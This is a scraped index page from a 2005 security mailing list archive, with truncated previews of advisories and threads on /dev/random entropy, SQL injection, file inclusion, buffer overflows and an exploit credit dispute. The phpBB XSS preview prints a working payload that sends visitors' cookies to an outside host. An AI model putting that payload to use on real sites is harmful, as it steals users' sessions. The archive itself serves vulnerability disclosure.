|
|
Colapse all |
Post message
Re: /dev/random is probably not 2005-07-06 devnull Rodents Montreal QC CA [The From: is a bitbucket, to deflect the hordes of broken autoresponders. Use the address in the signature to reach me.] > The original email pointed out that disk seek times may not be quite > as random as previously thought, especially with compact flash and > similar mediums. According to the [ more ] [ reply ] Re: /dev/random is probably not 2005-07-05 ChayoteMu (chayotemu gmail com) It's not necessarily the traffic itself, but aspects of the traffic. Someone had mentioned that the timing between recieving the packets was what's used, even if you see that it may change over the rest of the wire and there's nothing to say that the system is using all the traffic as the attacker s [ more ] [ reply ] VoIP-Phones: Weakness in proccessing SIP-Notify-Messages 2005-07-06 Tobias Glemser (tglemser tele-consulting com) Re: Microsoft Internet Explorer "javaprxy.dll" Code Execution Exploit 2005-07-05 berendjanwever gmail com Thanks you all for notifying the frsirt team of their credit/copyright missteps, they seem to have corrected this on their website. I would like to request any exploit archive to reflect their changes and warn any developers that the code is under GPL and any work based on it will therefore also be [ more ] [ reply ] Advisory 07/2005: Jaws Multiple Remote Code Execution Vulnerabilities 2005-07-06 Stefan Esser (sesser hardened-php net) [SECURITY] [DSA 738-1] New razor packages fix potential DOS 2005-07-05 Michael Stone (mstone klecker debian org) Solaris Socket Hijack 2005-07-06 c0ntexb gmail com /* ************************************************************************ ***************************************** $ An open security advisory #7 - SUN Solaris SO_REUSEADDR Local Socket Hijack Bug ************************************************************************ ********************** [ more ] [ reply ] [SECURITY] [DSA 740-1] New zlib packages fix denial of service 2005-07-06 Michael Stone (mstone klecker debian org) FreeBSD Security Advisory FreeBSD-SA-05:16.zlib 2005-07-06 FreeBSD Security Advisories (security-advisories freebsd org) SUSE Security Announcement: heimdal telnetd remote buffer overflow (SUSE-SA:2005:040) 2005-07-06 Marcus Meissner (meissner suse de) SUSE Security Announcement: zlib denial of service attack (SUSE-SA:2005:039) 2005-07-06 Marcus Meissner (meissner suse de) McAfee Intrushield IPS Abuse 2005-07-06 c0ntexb gmail com /* ************************************************************************ ***************************************** $ An open security advisory #8 - McAfee Intrushield IPS Management Console Abuse ************************************************************************ *********************** [ more ] [ reply ] Passwords in RAM dumps [formally Novell GroupWise Plain TextPassword Vulnerability.] 2005-07-04 Anything But Microsoft (abm anythingbutmicrosoft org) (1 replies) App after app tested by me here finds my user name and password in memory. Two apps out of fourteen tested stored the password in RAM with some type of hash. But I wouldn't be surprised if this was easily translated. I've only looked at the running process of five apps on Linux so far but have yet [ more ] [ reply ] Re: Passwords in RAM dumps [formally Novell GroupWise Plain Text Password Vulnerability.] 2005-07-05 Jason Coombs (jasonc science org) Re: /dev/random is probably not 2005-07-05 Robert Foxworth (rfoxwor1 tampabay rr com) > Charles M. Hannum wrote: > > Most implementations of /dev/random (or so-called "entropy gathering daemons") > > rely on disk I/O timings as a primary source of randomness. This is based on > > a CRYPTO '94 paper[1] that analyzed randomness from air turbulence inside the > > drive case. At the [ more ] [ reply ] Imail Cookie Vulnerability (unhashed) 2005-07-05 Sintigan insecure net Neither Regular or secure mode of Imail properly give out a hash on cookies leaving the cookies straight readable to any onlookers. No exploit is needed POC: "IMail_UserId 1006332dgd2@Someserver" -------------------------- "IMail_password 1234" Straight From Cookie ^^ (edited to protect user) S [ more ] [ reply ] ekg insecure temporary file creation and arbitrary code execution 2005-07-05 ZATAZ Audits (exploits zataz net) ######################################################### ekg insecure temporary file creation and arbitrary code execution Vendor: http://dev.null.pl/ekg/ Advisory: http://www.zataz.net/adviso/ekg-06062005.txt Vendor informed: yes Exploit available: no Impact : high Exploitation : high ######### [ more ] [ reply ] [covide] possible sql injection 2005-07-05 Hans Wolters (hans wolters xs4all nl) Summary: Covide, a webbased groupware application has had a problem where it was possible to inject sql due to special crafted urls. This made it possible to change the user id once logged in. Solution provided to the authors: Type cast the queries where possible and check user input to see if i [ more ] [ reply ] XSS in nested tag in phpbb 2.0.16 2005-07-05 alex (pigrelax yandex ru) Hi all! Example: [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF' styl e='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://a ntic hat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0; ][/u rl][/url]'[/color] More info: http://www.security [ more ] [ reply ] MyGuestbook Remote File Inclusion. 2005-07-05 group (at) soulblack.com (dot) ar [email concealed] (group soulblack com ar) =========================================================== ============================================================ Title: MyGuestbook Remote File Inclusion. Vulnerability Discovery: SoulBlack - Security Research - http://soulblack.com.ar Date: 05/07/2005 Severity: High. Remote Users Can Execu [ more ] [ reply ] [badroot security] probe.cgi: Remote Command Execution 2005-07-05 mozako (mozako mybox it) ___________________________________________________________ BADROOT SECURITY GROUP Security Advisory 2005 - #0x06 http://www.badroot.org irc.us.azzurra.org ~ #badroot ___________________________________________________________ Authors ....... spher3 (spher3 at fatalimpulse dot net) Date ........ [ more ] [ reply ] Re: [badroot security] AutoIndex PHP Script: XSS vulnerability 2005-07-05 mozako (mozako mybox it) Sorry for distraction errors. This is the correct ADV: _______________________________________________________ BADROOT SECURITY GROUP Security Advisory 2005-#0x07 http://www.badroot.org irc.us.azzurra.org ~ #badroot _______________________________________________________ Authors ....... mozako f [ more ] [ reply ] iDEFENSE Security Advisory 07.05.05: Adobe Acrobat Reader UnixAppOpenFilePerform() Buffer Overflow Vulnerability 2005-07-05 iDEFENSE Labs (labs-no-reply idefense com) Adobe Acrobat Reader UnixAppOpenFilePerform() Buffer Overflow Vulnerability iDEFENSE Security Advisory 07.05.05 www.idefense.com/application/poi/display?id=279&type=vulnerabilities July 05, 2005 I. BACKGROUND Adobe Acrobat Reader is a program for viewing Portable Document Format (PDF) documents. [ more ] [ reply ] Re: Microsoft Internet Explorer "javaprxy.dll" Code Execution Exploit 2005-07-05 give_credit where_credit_is_due fr Although I respect these Frenchies for their "attempt" to make the Internet safer, I denounce them for failing miserably. I think it's worth noting that they stole Skylined's code, stripped it of the GPL, the comments, and the credit, only to make themselves look better. This is the original script: [ more ] [ reply ] |
|
Privacy Statement |
Use the address in the signature to reach me.]
> Why anyone is using the old entropy based RNG at all on modern
> commodity hardware?
Who said anything about "modern commodity hardware"? :)
Not all machines running most of th
[ more ] [ reply ]